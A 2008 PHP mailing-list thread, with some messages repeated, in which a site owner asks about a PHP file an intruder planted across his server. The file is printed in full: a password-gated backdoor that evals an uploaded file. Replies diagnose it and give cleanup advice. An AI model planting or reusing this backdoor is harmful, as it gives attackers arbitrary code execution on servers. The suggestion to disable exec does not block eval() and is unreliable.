Re: [PHP] Hack question
Al wrote: I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files. ?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo $t\n; }; function testdata($t) { say(md5(testdata_$t)); }; echo pre; testdata('start'); if (md5($_POST[p])==aace99428c50dbe965acc93f3f275cd3){ if ($code = @fread(@fopen($HTTP_POST_FILES[f][tmp_name],rb),$HTTP_POST_FILES[f][size])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo /pre; ? ?php error_reporting(1); global $HTTP_SERVER_VARS; function say($t) { echo $t\n; } ; function testdata($t) { say(md5(testdata_$t)); } ; echo pre; testdata('start'); if (md5($_POST[p]) == aace99428c50dbe965acc93f3f275cd3) { if ($code = @fread(@fopen($HTTP_POST_FILES[f][tmp_name], rb), $HTTP_POST_FILES[f][size])) { eval($code); } else { testdata('f'); } ; } else { testdata('pass'); } ; testdata('end'); echo /pre; ? Don't always assume it is PHP. Is Apache running as nobody? If so, it could be Apache using the PUT method to place the file in a writable directory. -- Jim Lucas Some men are born to greatness, some achieve greatness, and some have greatness thrust upon them. Twelfth Night, Act II, Scene V by William Shakespeare -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Hack question
Can you explain this in more detail for me. Sounds like this code is providing the entry point for the other hack code. Greg Bowser wrote: I can sort of figure what is doing; but, I can't figure out what the hacker is using it for. It will allow him to upload and execute arbitrary code on your server. Generally speaking, arbitrary code execution is a bad thing. :). -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Hack question
On Thu, Apr 17, 2008 at 8:15 AM, Al [EMAIL PROTECTED] wrote: Can you explain this in more detail for me. Sounds like this code is providing the entry point for the other hack code. It probably is, by reading the code from the malicious /tmp files (/tmp should not allow any execution, by the way). However, more of an issue is how the exploit code got on there in the first place. Don't just settle for fixing an issue; solve the problem. Otherwise, it'll just happen again and again. -- /Daniel P. Brown Dedicated Servers - Intel 2.4GHz w/2TB bandwidth/mo. starting at just $59.99/mo. with no contract! Dedicated servers, VPS, and hosting from $2.50/mo. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Hack question
I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files. ?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo $t\n; }; function testdata($t) { say(md5(testdata_$t)); }; echo pre; testdata('start'); if (md5($_POST[p])==aace99428c50dbe965acc93f3f275cd3){ if ($code = @fread(@fopen($HTTP_POST_FILES[f][tmp_name],rb),$HTTP_POST_FILES[f][size])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo /pre; ? ?php error_reporting(1); global $HTTP_SERVER_VARS; function say($t) { echo $t\n; } ; function testdata($t) { say(md5(testdata_$t)); } ; echo pre; testdata('start'); if (md5($_POST[p]) == aace99428c50dbe965acc93f3f275cd3) { if ($code = @fread(@fopen($HTTP_POST_FILES[f][tmp_name], rb), $HTTP_POST_FILES[f][size])) { eval($code); } else { testdata('f'); } ; } else { testdata('pass'); } ; testdata('end'); echo /pre; ? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Hack question
Al wrote: I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files. Hi, If I look up the md5 digest 'aace99428c50dbe965acc93f3f275cd3', more people on the internet have (had) problems with this kind of hack. A quick md5 lookup comes with this: Ox93Mdpqme8s But that doesn't give any Google results, so nobody knows what it is for (or related to). Do you have any third party software installed? Like a BB or a CMS or whatever? When these hackers know your site/server is vulnerable they will keep on exploiting it. Even if it just means SMTP relaying for phishing or a HTTP directory for putting malware in. Keep track of your HTTP-logs and see if these URL's are being requested! Kind regards, Aschwin Wesselius -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Hack question
I can sort of figure what is doing; but, I can't figure out what the hacker is using it for. It will allow him to upload and execute arbitrary code on your server. Generally speaking, arbitrary code execution is a bad thing. :). -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Hack question
Al wrote: I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files. Hi, If I look up the md5 digest 'aace99428c50dbe965acc93f3f275cd3', more people on the internet have (had) problems with this kind of hack. A quick md5 lookup comes with this: Ox93Mdpqme8s But that doesn't give any Google results, so nobody knows what it is for (or related to). Do you have any third party software installed? Like a BB or a CMS or whatever? When these hackers know your site/server is vulnerable they will keep on exploiting it. Even if it just means SMTP relaying for phishing or a HTTP directory for putting malware in. Keep track of your HTTP-logs and see if these URL's are being requested! Kind regards, Aschwin Wesselius -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Hack question
On Wed, Apr 16, 2008 at 12:13 PM, Al [EMAIL PROTECTED] wrote: I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files. [snip=code] Al, It looks to me as though there may be a script that's allowing writing, judging by the all-as-one-string nature of the first script example. Check your Apache logs to see if that string appears, and if so, to what script it's attacking. Then review the script. If you need a hand, feel free to contact me privately and we can discuss it further. -- /Daniel P. Brown Ask me about: Dedicated servers starting @ $59.99/mo., VPS starting @ $19.99/mo., and shared hosting starting @ $2.50/mo. Unmanaged, managed, and fully-managed! -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Hack question
Al wrote: I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php script because the owner is nobody. I can sort of figure what is doing; but, I can't figure out what the hacker is using it for. Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files. ?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo $t\n; }; function testdata($t) { say(md5(testdata_$t)); }; echo pre; testdata('start'); if (md5($_POST[p])==aace99428c50dbe965acc93f3f275cd3){ if ($code = @fread(@fopen($HTTP_POST_FILES[f][tmp_name],rb),$HTTP_POST_FILES[f][size])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo /pre; ? ?php error_reporting(1); global $HTTP_SERVER_VARS; function say($t) { echo $t\n; } ; function testdata($t) { say(md5(testdata_$t)); } ; echo pre; testdata('start'); if (md5($_POST[p]) == aace99428c50dbe965acc93f3f275cd3) { if ($code = @fread(@fopen($HTTP_POST_FILES[f][tmp_name], rb), $HTTP_POST_FILES[f][size])) { eval($code); } else { testdata('f'); } ; } else { testdata('pass'); } ; testdata('end'); echo /pre; ? My first suggestion is disable the use of exec in the disable_functions entry in your php.ini file. I would not allow the call to exec to be completed. so, something like this should work for now. disable_functions = exec also, you could modify the file that is being ran to actually capture the uploaded file contents. change out the exec part and have it log it to a file somewhere. Then you can see what they are actually trying to do. -- Jim Lucas Some men are born to greatness, some achieve greatness, and some have greatness thrust upon them. Twelfth Night, Act II, Scene V by William Shakespeare -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php